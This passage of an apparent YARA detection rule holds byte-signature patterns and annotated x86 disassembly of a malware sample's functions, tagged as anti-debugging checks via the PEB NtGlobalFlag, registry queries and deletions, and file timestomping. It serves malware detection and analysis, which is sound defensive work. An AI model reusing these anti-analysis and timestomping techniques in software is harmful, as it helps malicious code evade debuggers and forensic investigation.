.text:0x00401472 eb35 jmp 0x004014a9 + .text:0x00401474 loc_00401474: [1 XREFS] + .text:0x00401474 6848c04000 push 0x0040c048 + .text:0x00401479 8b55f8 mov edx,dword [ebp - 8] + .text:0x0040147c 52 push edx + .text:0x0040147d ff1514b04000 call dword [0x0040b014] ;advapi32.RegDeleteValueA(0xfefefefe,0x0040c048) + .text:0x00401483 8945fc mov dword [ebp - 4],eax + .text:0x00401486 837dfc00 cmp dword [ebp - 4],0 + .text:0x0040148a 7411 jz 0x0040149d + .text:0x0040148c 8b45f8 mov eax,dword [ebp - 8] + .text:0x0040148f 50 push eax + .text:0x00401490 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(0xfefefefe) + .text:0x00401496 b801000000 mov eax,1 + .text:0x0040149b eb0c jmp 0x004014a9 + .text:0x0040149d loc_0040149d: [1 XREFS] + .text:0x0040149d 8b4df8 mov ecx,dword [ebp - 8] + .text:0x004014a0 51 push ecx + .text:0x004014a1 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(0xfefefefe) + .text:0x004014a7 33c0 xor eax,eax + .text:0x004014a9 loc_004014a9: [2 XREFS] + .text:0x004014a9 5f pop edi + .text:0x004014aa 5e pop esi + .text:0x004014ab 5b pop ebx + .text:0x004014ac 8be5 mov esp,ebp + .text:0x004014ae 5d pop ebp + .text:0x004014af c3 ret + */ + $c24 = { 55 8B EC 83 EC 14 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 45 ?? 83 7D ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 45 ?? 83 7D ?? 00 75 ?? E8 ?? ?? ?? ?? 6A 00 8D 4D ?? 51 6A 00 68 3F 00 0F 00 6A 00 6A 00 6A 00 68 58 C0 40 00 68 02 00 00 80 FF 15 ?? ?? ?? ?? 85 C0 74 ?? B8 01 00 00 00 EB ?? 68 48 C0 40 00 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 74 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x004014b0@7faafc7e4a5c736ebfee6abbbc812d80 with 2 features: + - check for PEB NtGlobalFlag flag + - query or enumerate registry value + .text:0x004014b0 + .text:0x004014b0 FUNC: int cdecl sub_004014b0( int arg0, int arg1, int arg2, int arg3, int arg4, int arg5, int arg6, ) [8 XREFS] + .text:0x004014b0 + .text:0x004014b0 Stack Variables: (offset from initial top of stack) + .text:0x004014b0 28: int arg6 + .text:0x004014b0 24: int arg5 + .text:0x004014b0 20: int arg4 + .text:0x004014b0 16: int arg3 + .text:0x004014b0 12: int arg2 + .text:0x004014b0 8: int arg1 + .text:0x004014b0 4: int arg0 + .text:0x004014b0 -8: int local8 + .text:0x004014b0 -12: int local12 + .text:0x004014b0 -4108: int local4108 + .text:0x004014b0 -4112: int local4112 + .text:0x004014b0 -4116: int local4116 + .text:0x004014b0 -4120: int local4120 + .text:0x004014b0 -4124: int local4124 + .text:0x004014b0 -4128: int local4128 + .text:0x004014b0 + .text:0x004014b0 55 push ebp + .text:0x004014b1 8bec mov ebp,esp + .text:0x004014b3 b81c100000 mov eax,0x0000101c + .text:0x004014b8 e8b3240000 call 0x00403970 ;__alloca_probe() + .text:0x004014bd 53 push ebx + .text:0x004014be 56 push esi + .text:0x004014bf 57 push edi + .text:0x004014c0 c785e8efffff0000 mov dword [ebp - 4120],0 + .text:0x004014ca c785e4efffff0000 mov dword [ebp - 4124],0 + .text:0x004014d4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004014da 8a5802 mov bl,byte [eax + 2] + .text:0x004014dd 889decefffff mov byte [ebp - 4116],bl + .text:0x004014e3 0fbe85ecefffff movsx eax,byte [ebp - 4116] + .text:0x004014ea 85c0 test eax,eax + .text:0x004014ec 7405 jz 0x004014f3 + .text:0x004014ee e80dfbffff call 0x00401000 ;sub_00401000() + .text:0x004014f3 loc_004014f3: [1 XREFS] + .text:0x004014f3 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004014f9 8b4018 mov eax,dword [eax + 24] + .text:0x004014fc 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00401500 8985e8efffff mov dword [ebp - 4120],eax + .text:0x00401506 83bde8efffff00 cmp dword [ebp - 4120],0 + .text:0x0040150d 7405 jz 0x00401514 + .text:0x0040150f e8ecfaffff call 0x00401000 ;sub_00401000() + .text:0x00401514 loc_00401514: [1 XREFS] + .text:0x00401514 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040151a 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x0040151e 83e870 sub eax,112 + .text:0x00401521 8985e4efffff mov dword [ebp - 4124],eax + .text:0x00401527 83bde4efffff00 cmp dword [ebp - 4124],0 + .text:0x0040152e 7505 jnz 0x00401535 + .text:0x00401530 e8cbfaffff call 0x00401000 ;sub_00401000() + .text:0x00401535 loc_00401535: [1 XREFS] + .text:0x00401535 c745f801100000 mov dword [ebp - 8],0x00001001 + .text:0x0040153c 8d8df0efffff lea ecx,dword [ebp - 4112] + .text:0x00401542 51 push ecx + .text:0x00401543 683f000f00 push 0x000f003f + .text:0x00401548 6a00 push 0 + .text:0x0040154a 6858c04000 push 0x0040c058 + .text:0x0040154f 6802000080 push 0x80000002 + .text:0x00401554 ff1520b04000 call dword [0x0040b020] ;advapi32.RegOpenKeyExA(0x80000002,0x0040c058,0,0x000f003f,local4116) + .text:0x0040155a 85c0 test eax,eax + .text:0x0040155c 740a jz 0x00401568 + .text:0x0040155e b801000000 mov eax,1 + .text:0x00401563 e94f010000 jmp 0x004016b7 + .text:0x00401568 loc_00401568: [1 XREFS] + .text:0x00401568 8d55f8 lea edx,dword [ebp - 8] + .text:0x0040156b 52 push edx + .text:0x0040156c 8d85f8efffff lea eax,dword [ebp - 4104] + .text:0x00401572 50 push eax + .text:0x00401573 6a00 push 0 + .text:0x00401575 6a00 push 0 + .text:0x00401577 6848c04000 push 0x0040c048 + .text:0x0040157c 8b8df0efffff mov ecx,dword [ebp - 4112] + .text:0x00401582 51 push ecx + .text:0x00401583 ff1524b04000 call dword [0x0040b024] ;advapi32.RegQueryValueExA(0xfefefefe,0x0040c048,0,0,local4108,local12) + .text:0x00401589 8985f4efffff mov dword [ebp - 4108],eax + .text:0x0040158f 83bdf4efffff00 cmp dword [ebp - 4108],0 + .text:0x00401596 7417 jz 0x004015af + .text:0x00401598 8b95f0efffff mov edx,dword [ebp - 4112] + .text:0x0040159e 52 push edx + .text:0x0040159f ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(0xfefefefe) + .text:0x004015a5 b801000000 mov eax,1 + .text:0x004015aa e908010000 jmp 0x004016b7 + .text:0x004015af loc_004015af: [1 XREFS] + .text:0x004015af 8d85f8efffff lea eax,dword [ebp - 4104] + .text:0x004015b5 8945fc mov dword [ebp - 4],eax + .text:0x004015b8 8b7dfc mov edi,dword [ebp - 4] + .text:0x004015bb 8b5508 mov edx,dword [ebp + 8] + .text:0x004015be 83c9ff or ecx,0xffffffff + .text:0x004015c1 33c0 xor eax,eax + .text:0x004015c3 f2ae repnz: scasb + .text:0x004015c5 f7d1 not ecx + .text:0x004015c7 2bf9 sub edi,ecx + .text:0x004015c9 8bf7 mov esi,edi + .text:0x004015cb 8bc1 mov eax,ecx + .text:0x004015cd 8bfa mov edi,edx + .text:0x004015cf c1e902 shr ecx,2 + .text:0x004015d2 f3a5 rep: movsd + .text:0x004015d4 8bc8 mov ecx,eax + .text:0x004015d6 83e103 and ecx,3 + .text:0x004015d9 f3a4 rep: movsb + .text:0x004015db 8b7d08 mov edi,dword [ebp + 8] + .text:0x004015de 83c9ff or ecx,0xffffffff + .text:0x004015e1 33c0 xor eax,eax + .text:0x004015e3 f2ae repnz: scasb + .text:0x004015e5 f7d1 not ecx + .text:0x004015e7 83c1ff add ecx,0xffffffff + .text:0x004015ea 8b55fc mov edx,dword [ebp - 4] + .text:0x004015ed 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x004015f1 8945fc mov dword [ebp - 4],eax + .text:0x004015f4 8b7dfc mov edi,dword [ebp - 4] + .text:0x004015f7 8b5510 mov edx,dword [ebp + 16] + .text:0x004015fa 83c9ff or ecx,0xffffffff + .text:0x004015fd 33c0 xor eax,eax + .text:0x004015ff f2ae repnz: scasb + .text:0x00401601 f7d1 not ecx + .text:0x00401603 2bf9 sub edi,ecx + .text:0x00401605 8bf7 mov esi,edi + .text:0x00401607 8bc1 mov eax,ecx + .text:0x00401609 8bfa mov edi,edx + .text:0x0040160b c1e902 shr ecx,2 + .text:0x0040160e f3a5 rep: movsd + .text:0x00401610 8bc8 mov ecx,eax + .text:0x00401612 83e103 and ecx,3 + .text:0x00401615 f3a4 rep: movsb + .text:0x00401617 8b7d10 mov edi,dword [ebp + 16] + .text:0x0040161a 83c9ff or ecx,0xffffffff + .text:0x0040161d 33c0 xor eax,eax + .text:0x0040161f f2ae repnz: scasb + .text:0x00401621 f7d1 not ecx + .text:0x00401623 83c1ff add ecx,0xffffffff + .text:0x00401626 8b55fc mov edx,dword [ebp - 4] + .text:0x00401629 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x0040162d 8945fc mov dword [ebp - 4],eax + .text:0x00401630 8b7dfc mov edi,dword [ebp - 4] + .text:0x00401633 8b5518 mov edx,dword [ebp + 24] + .text:0x00401636 83c9ff or ecx,0xffffffff + .text:0x00401639 33c0 xor eax,eax + .text:0x0040163b f2ae repnz: scasb + .text:0x0040163d f7d1 not ecx + .text:0x0040163f 2bf9 sub edi,ecx + .text:0x00401641 8bf7 mov esi,edi + .text:0x00401643 8bc1 mov eax,ecx + .text:0x00401645 8bfa mov edi,edx + .text:0x00401647 c1e902 shr ecx,2 + .text:0x0040164a f3a5 rep: movsd + .text:0x0040164c 8bc8 mov ecx,eax + .text:0x0040164e 83e103 and ecx,3 + .text:0x00401651 f3a4 rep: movsb + .text:0x00401653 8b7d18 mov edi,dword [ebp + 24] + .text:0x00401656 83c9ff or ecx,0xffffffff + .text:0x00401659 33c0 xor eax,eax + .text:0x0040165b f2ae repnz: scasb + .text:0x0040165d f7d1 not ecx + .text:0x0040165f 83c1ff add ecx,0xffffffff + .text:0x00401662 8b55fc mov edx,dword [ebp - 4] + .text:0x00401665 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x00401669 8945fc mov dword [ebp - 4],eax + .text:0x0040166c 8b7dfc mov edi,dword [ebp - 4] + .text:0x0040166f 8b5520 mov edx,dword [ebp + 32] + .text:0x00401672 83c9ff or ecx,0xffffffff + .text:0x00401675 33c0 xor eax,eax + .text:0x00401677 f2ae repnz: scasb + .text:0x00401679 f7d1 not ecx + .text:0x0040167b 2bf9 sub edi,ecx + .text:0x0040167d 8bf7 mov esi,edi + .text:0x0040167f 8bc1 mov eax,ecx + .text:0x00401681 8bfa mov edi,edx + .text:0x00401683 c1e902 shr ecx,2 + .text:0x00401686 f3a5 rep: movsd + .text:0x00401688 8bc8 mov ecx,eax + .text:0x0040168a 83e103 and ecx,3 + .text:0x0040168d f3a4 rep: movsb + .text:0x0040168f 8b7d20 mov edi,dword [ebp + 32] + .text:0x00401692 83c9ff or ecx,0xffffffff + .text:0x00401695 33c0 xor eax,eax + .text:0x00401697 f2ae repnz: scasb + .text:0x00401699 f7d1 not ecx + .text:0x0040169b 83c1ff add ecx,0xffffffff + .text:0x0040169e 8b55fc mov edx,dword [ebp - 4] + .text:0x004016a1 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x004016a5 8945fc mov dword [ebp - 4],eax + .text:0x004016a8 8b8df0efffff mov ecx,dword [ebp - 4112] + .text:0x004016ae 51 push ecx + .text:0x004016af ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(0xfefefefe) + .text:0x004016b5 33c0 xor eax,eax + .text:0x004016b7 loc_004016b7: [2 XREFS] + .text:0x004016b7 5f pop edi + .text:0x004016b8 5e pop esi + .text:0x004016b9 5b pop ebx + .text:0x004016ba 8be5 mov esp,ebp + .text:0x004016bc 5d pop ebp + .text:0x004016bd c3 ret + */ + $c25 = { 55 8B EC B8 1C 10 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? C7 45 ?? 01 10 00 00 8D 8D ?? ?? ?? ?? 51 68 3F 00 0F 00 6A 00 68 58 C0 40 00 68 02 00 00 80 FF 15 ?? ?? ?? ?? 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8D 55 ?? 52 8D 85 ?? ?? ?? ?? 50 6A 00 6A 00 68 48 C0 40 00 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x004016c0@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x004016c0 + .text:0x004016c0 FUNC: int cdecl sub_004016c0( int arg0, int arg1, ) [2 XREFS] + .text:0x004016c0 + .text:0x004016c0 Stack Variables: (offset from initial top of stack) + .text:0x004016c0 8: int arg1 + .text:0x004016c0 4: int arg0 + .text:0x004016c0 -1028: int local1028 + .text:0x004016c0 -2052: int local2052 + .text:0x004016c0 -3076: int local3076 + .text:0x004016c0 -3080: int local3080 + .text:0x004016c0 -3084: int local3084 + .text:0x004016c0 -3088: int local3088 + .text:0x004016c0 + .text:0x004016c0 55 push ebp + .text:0x004016c1 8bec mov ebp,esp + .text:0x004016c3 81ec0c0c0000 sub esp,3084 + .text:0x004016c9 53 push ebx + .text:0x004016ca 56 push esi + .text:0x004016cb 57 push edi + .text:0x004016cc c785f8f3ffff0000 mov dword [ebp - 3080],0 + .text:0x004016d6 c785f4f3ffff0000 mov dword [ebp - 3084],0 + .text:0x004016e0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004016e6 8a5802 mov bl,byte [eax + 2] + .text:0x004016e9 889dfcf3ffff mov byte [ebp - 3076],bl + .text:0x004016ef 0fbe85fcf3ffff movsx eax,byte [ebp - 3076] + .text:0x004016f6 85c0 test eax,eax + .text:0x004016f8 7405 jz 0x004016ff + .text:0x004016fa e801f9ffff call 0x00401000 ;sub_00401000() + .text:0x004016ff loc_004016ff: [1 XREFS] + .text:0x004016ff 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401705 8b4018 mov eax,dword [eax + 24] + .text:0x00401708 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x0040170c 8985f8f3ffff mov dword [ebp - 3080],eax + .text:0x00401712 83bdf8f3ffff00 cmp dword [ebp - 3080],0 + .text:0x00401719 7405 jz 0x00401720 + .text:0x0040171b e8e0f8ffff call 0x00401000 ;sub_00401000() + .text:0x00401720 loc_00401720: [1 XREFS] + .text:0x00401720 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401726 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x0040172a 83e870 sub eax,112 + .text:0x0040172d 8985f4f3ffff mov dword [ebp - 3084],eax + .text:0x00401733 83bdf4f3ffff00 cmp dword [ebp - 3084],0 + .text:0x0040173a 7505 jnz 0x00401741 + .text:0x0040173c e8bff8ffff call 0x00401000 ;sub_00401000() + .text:0x00401741 loc_00401741: [1 XREFS] + .text:0x00401741 6800040000 push 1024 + .text:0x00401746 8d8d00fcffff lea ecx,dword [ebp - 1024] + .text:0x0040174c 51 push ecx + .text:0x0040174d 6800040000 push 1024 + .text:0x00401752 8d9500f4ffff lea edx,dword [ebp - 3072] + .text:0x00401758 52 push edx + .text:0x00401759 8b450c mov eax,dword [ebp + 12] + .text:0x0040175c 50 push eax + .text:0x0040175d 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401760 51 push ecx + .text:0x00401761 6800040000 push 1024 + .text:0x00401766 8d9500f8ffff lea edx,dword [ebp - 2048] + .text:0x0040176c 52 push edx + .text:0x0040176d e83efdffff call 0x004014b0 ;sub_004014b0(local2052,1024,arg0,arg1,local3076,1024,local1028) + .text:0x00401772 83c420 add esp,32 + .text:0x00401775 85c0 test eax,eax + .text:0x00401777 7407 jz 0x00401780 + .text:0x00401779 b801000000 mov eax,1 + .text:0x0040177e eb02 jmp 0x00401782 + .text:0x00401780 loc_00401780: [1 XREFS] + .text:0x00401780 33c0 xor eax,eax + .text:0x00401782 loc_00401782: [1 XREFS] + .text:0x00401782 5f pop edi + .text:0x00401783 5e pop esi + .text:0x00401784 5b pop ebx + .text:0x00401785 8be5 mov esp,ebp + .text:0x00401787 5d pop ebp + .text:0x00401788 c3 ret + */ + $c26 = { 55 8B EC 81 EC 0C 0C 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 68 00 04 00 00 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 8B 4D ?? 51 68 00 04 00 00 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 20 85 C0 74 ?? B8 01 00 00 00 EB ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00401790@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x00401790 + .text:0x00401790 FUNC: int cdecl sub_00401790( int arg0, ) [2 XREFS] + .text:0x00401790 + .text:0x00401790 Stack Variables: (offset from initial top of stack) + .text:0x00401790 4: int arg0 + .text:0x00401790 -1028: int local1028 + .text:0x00401790 -2052: int local2052 + .text:0x00401790 -3076: int local3076 + .text:0x00401790 -4100: int local4100 + .text:0x00401790 -4104: int local4104 + .text:0x00401790 -4108: int local4108 + .text:0x00401790 -4112: int local4112 + .text:0x00401790 + .text:0x00401790 55 push ebp + .text:0x00401791 8bec mov ebp,esp + .text:0x00401793 b80c100000 mov eax,0x0000100c + .text:0x00401798 e8d3210000 call 0x00403970 ;__alloca_probe() + .text:0x0040179d 53 push ebx + .text:0x0040179e 56 push esi + .text:0x0040179f 57 push edi + .text:0x004017a0 c785f8efffff0000 mov dword [ebp - 4104],0 + .text:0x004017aa c785f4efffff0000 mov dword [ebp - 4108],0 + .text:0x004017b4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004017ba 8a5802 mov bl,byte [eax + 2] + .text:0x004017bd 889dfcefffff mov byte [ebp - 4100],bl + .text:0x004017c3 0fbe85fcefffff movsx eax,byte [ebp - 4100] + .text:0x004017ca 85c0 test eax,eax + .text:0x004017cc 7405 jz 0x004017d3 + .text:0x004017ce e82df8ffff call 0x00401000 ;sub_00401000() + .text:0x004017d3 loc_004017d3: [1 XREFS] + .text:0x004017d3 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004017d9 8b4018 mov eax,dword [eax + 24] + .text:0x004017dc 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x004017e0 8985f8efffff mov dword [ebp - 4104],eax + .text:0x004017e6 83bdf8efffff00 cmp dword [ebp - 4104],0 + .text:0x004017ed 7405 jz 0x004017f4 + .text:0x004017ef e80cf8ffff call 0x00401000 ;sub_00401000() + .text:0x004017f4 loc_004017f4: [1 XREFS] + .text:0x004017f4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004017fa 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x004017fe 83e870 sub eax,112 + .text:0x00401801 8985f4efffff mov dword [ebp - 4108],eax + .text:0x00401807 83bdf4efffff00 cmp dword [ebp - 4108],0 + .text:0x0040180e 7505 jnz 0x00401815 + .text:0x00401810 e8ebf7ffff call 0x00401000 ;sub_00401000() + .text:0x00401815 loc_00401815: [1 XREFS] + .text:0x00401815 6800040000 push 1024 + .text:0x0040181a 8d8d00fcffff lea ecx,dword [ebp - 1024] + .text:0x00401820 51 push ecx + .text:0x00401821 6800040000 push 1024 + .text:0x00401826 8d9500f0ffff lea edx,dword [ebp - 4096] + .text:0x0040182c 52 push edx + .text:0x0040182d 6800040000 push 1024 + .text:0x00401832 8d8500f8ffff lea eax,dword [ebp - 2048] + .text:0x00401838 50 push eax + .text:0x00401839 6800040000 push 1024 + .text:0x0040183e 8d8d00f4ffff lea ecx,dword [ebp - 3072] + .text:0x00401844 51 push ecx + .text:0x00401845 e866fcffff call 0x004014b0 ;sub_004014b0(local3076,1024,local2052,1024,local4100,1024,local1028) + .text:0x0040184a 83c420 add esp,32 + .text:0x0040184d 85c0 test eax,eax + .text:0x0040184f 7407 jz 0x00401858 + .text:0x00401851 b801000000 mov eax,1 + .text:0x00401856 eb16 jmp 0x0040186e + .text:0x00401858 loc_00401858: [1 XREFS] + .text:0x00401858 8d9500f0ffff lea edx,dword [ebp - 4096] + .text:0x0040185e 52 push edx + .text:0x0040185f e8c6210000 call 0x00403a2a ;_atoi(local4100) + .text:0x00401864 83c404 add esp,4 + .text:0x00401867 8b4d08 mov ecx,dword [ebp + 8] + .text:0x0040186a 8901 mov dword [ecx],eax + .text:0x0040186c 33c0 xor eax,eax + .text:0x0040186e loc_0040186e: [1 XREFS] + .text:0x0040186e 5f pop edi + .text:0x0040186f 5e pop esi + .text:0x00401870 5b pop ebx + .text:0x00401871 8be5 mov esp,ebp + .text:0x00401873 5d pop ebp + .text:0x00401874 c3 ret + */ + $c27 = { 55 8B EC B8 0C 10 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 68 00 04 00 00 8D 95 ?? ?? ?? ?? 52 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 20 85 C0 74 ?? B8 01 00 00 00 EB ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 8B 4D ?? 89 01 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00401880@7faafc7e4a5c736ebfee6abbbc812d80 with 2 features: + - check for PEB NtGlobalFlag flag + - timestomp file + .text:0x00401880 + .text:0x00401880 FUNC: int cdecl sub_00401880( int arg0, int arg1, ) [2 XREFS] + .text:0x00401880 + .text:0x00401880 Stack Variables: (offset from initial top of stack) + .text:0x00401880 8: int arg1 + .text:0x00401880 4: int arg0 + .text:0x00401880 -12: int local12 + .text:0x00401880 -20: int local20 + .text:0x00401880 -28: int local28 + .text:0x00401880 -32: int local32 + .text:0x00401880 -36: int local36 + .text:0x00401880 -40: int local40 + .text:0x00401880 -44: int local44 + .text:0x00401880 + .text:0x00401880 55 push ebp + .text:0x00401881 8bec mov ebp,esp + .text:0x00401883 83ec28 sub esp,40 + .text:0x00401886 53 push ebx + .text:0x00401887 56 push esi + .text:0x00401888 57 push edi + .text:0x00401889 c745dc00000000 mov dword [ebp - 36],0 + .text:0x00401890 c745d800000000 mov dword [ebp - 40],0 + .text:0x00401897 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040189d 8a5802 mov bl,byte [eax + 2] + .text:0x004018a0 885de0 mov byte [ebp - 32],bl + .text:0x004018a3 0fbe45e0 movsx eax,byte [ebp - 32] + .text:0x004018a7 85c0 test eax,eax + .text:0x004018a9 7405 jz 0x004018b0 + .text:0x004018ab e850f7ffff call 0x00401000 ;sub_00401000() + .text:0x004018b0 loc_004018b0: [1 XREFS] + .text:0x004018b0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004018b6 8b4018 mov eax,dword [eax + 24] + .text:0x004018b9 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x004018bd 8945dc mov dword [ebp - 36],eax + .text:0x004018c0 837ddc00 cmp dword [ebp - 36],0 + .text:0x004018c4 7405 jz 0x004018cb + .text:0x004018c6 e835f7ffff call 0x00401000 ;sub_00401000() + .text:0x004018cb loc_004018cb: [1 XREFS] + .text:0x004018cb 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004018d1 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x004018d5 83e870 sub eax,112 + .text:0x004018d8 8945d8 mov dword [ebp - 40],eax + .text:0x004018db 837dd800 cmp dword [ebp - 40],0 + .text:0x004018df 7505 jnz 0x004018e6 + .text:0x004018e1 e81af7ffff call 0x00401000 ;sub_00401000() + .text:0x004018e6 loc_004018e6: [1 XREFS] + .text:0x004018e6 6a00 push 0 + .text:0x004018e8 6880000000 push 128 + .text:0x004018ed 6a03 push 3 + .text:0x004018ef 6a00 push 0 + .text:0x004018f1 6a01 push 1 + .text:0x004018f3 6800000080 push 0x80000000 + .text:0x004018f8 8b4d0c mov ecx,dword [ebp + 12] + .text:0x004018fb 51 push ecx + .text:0x004018fc ff154cb04000 call dword [0x0040b04c] ;kernel32.CreateFileA(arg1,0x80000000,1,0,3,128,0) + .text:0x00401902 8945e4 mov dword [ebp - 28],eax + .text:0x00401905 837de400 cmp dword [ebp - 28],0 + .text:0x00401909 750a jnz 0x00401915 + .text:0x0040190b b801000000 mov eax,1 + .text:0x00401910 e98b000000 jmp 0x004019a0 + .text:0x00401915 loc_00401915: [1 XREFS] + .text:0x00401915 8d55f0 lea edx,dword [ebp - 16] + .text:0x00401918 52 push edx + .text:0x00401919 8d45e8 lea eax,dword [ebp - 24] + .text:0x0040191c 50 push eax + .text:0x0040191d 8d4df8 lea ecx,dword [ebp - 8] + .text:0x00401920 51 push ecx + .text:0x00401921 8b55e4 mov edx,dword [ebp - 28] + .text:0x00401924 52 push edx + .text:0x00401925 ff1550b04000 call dword [0x0040b050] ;kernel32.GetFileTime(kernel32.CreateFileA(arg1,0x80000000,1,0,3,128,0),local12,local28,local20) + .text:0x0040192b 85c0 test eax,eax + .text:0x0040192d 7511 jnz 0x00401940 + .text:0x0040192f 8b45e4 mov eax,dword [ebp - 28] + .text:0x00401932 50 push eax + .text:0x00401933 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(<0x004018fc>) + .text:0x00401939 b801000000 mov eax,1 + .text:0x0040193e eb60 jmp 0x004019a0 + 